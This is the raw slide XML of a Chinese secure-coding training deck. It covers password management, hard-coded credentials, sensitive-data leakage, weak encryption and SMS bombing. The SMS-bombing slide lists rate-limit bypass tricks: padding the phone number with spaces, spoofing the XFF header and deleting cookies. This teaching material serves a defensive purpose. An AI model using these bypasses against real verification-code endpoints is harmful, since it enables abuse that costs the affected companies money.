            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323528" y="90872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【代码示例】</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="4293096"/>
            <a:ext cx="7005464" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>绝不能对密码进行硬编码。通常情况下，应对密码加以模糊化，并在外部资源文件中进行管理。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在系统中采用明文的形式存储密码，会造成任何有充分权限的人读取和无意中误用密码。至少，密码要先经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>处理。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907704" y="1988840"/>
            <a:ext cx="5724644" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一旦源码遭到泄露，密码将非常容易被攻击者获取到。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="2516277"/>
            <a:ext cx="6562725" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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47652" y="3501008"/>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73907"/>
            <a:ext cx="6624637" cy="560153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口令</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>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弱</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>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15616" y="116632"/>
            <a:ext cx="6030912" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>口令管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323528" y="126876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【规范要求】</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>不要将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>作为注释写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>不要在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>表单中设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>的默认值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>应安全提交</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>建议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>不要在代码中进行硬编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>不要设置空口令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>限制口令长度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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27373" y="4437112"/>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73907"/>
            <a:ext cx="6624637" cy="6063198"/>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逻辑缺陷： 后台认证绕过漏洞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口令管理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弱</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>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网络安全已经不容忽视</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>金融技术中心</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8D486EDB-1F4B-46FD-9A29-FEB36E09C7CB}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657069" y="1939014"/>
            <a:ext cx="8068456" cy="784830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>   早在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0"/>
              <a:t>2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>年，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0"/>
              <a:t>Gartner Group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>根据 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0"/>
              <a:t>1000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>个受访单位的调查显示，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0"/>
              <a:t>75%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>的安全漏洞发生在应用程序层，而非网络层。根据美国国家标准与技术研究院（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0"/>
              <a:t>NIST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>）统计，超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0"/>
              <a:t>90%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>的已知安全漏洞存在与应用程序中，而非网络。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="512013" y="2955121"/>
            <a:ext cx="4061330" cy="2421062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3285098" y="5763554"/>
            <a:ext cx="3318782" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CNVD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全漏洞分布</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4647326" y="2955121"/>
            <a:ext cx="4078199" cy="2421063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947198" y="5409985"/>
            <a:ext cx="1710389" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>按漏洞位置分布</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231391" y="5376183"/>
            <a:ext cx="1710389" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>按漏洞原因分布</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15616" y="116632"/>
            <a:ext cx="6030912" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>敏感信息泄露</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323528" y="126876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【规范要求】</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>需要保护用户的隐私信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>以及其他关于系统的敏感信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>【释义说明】</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>在返回客户端数据时，应尽量减少用户信息的返回量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>银行卡号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>社保号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>身份证号……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>输入口令时，应进行隐藏</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>不允许在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>注释中泄露敏感信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>中的注释会泄露过多服务器信息，有助于黑客制定攻击方案，解决方案是采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>注释</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>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16231" y="4437112"/>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73907"/>
            <a:ext cx="6624637" cy="560153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口令</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>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弱</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>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弱加密</a:t>
            </a:r>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solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>危害</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    密码弱加密可直接进行解密，获取到明文数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>原因</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    使用的加密算法过于简单，比如只是进行了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>，或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>md5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>加密。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加固建议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>协议或者使用强加密算法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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83568" y="4941168"/>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1081712" y="773907"/>
            <a:ext cx="6624637" cy="560153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口令</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>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弱</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>信轰炸</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solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>危害</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    短信轰炸最直接的危害就是长时间进行的话，会对公司造成一定程度上的信息发送费用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>原因</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    在向手机发送验证码时，没有进行次数限制。或者虽然进行的次数或者时间的限制，但可以进行绕过，比如手机号后面加空格，添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>头绕过单个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>发送次数，删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
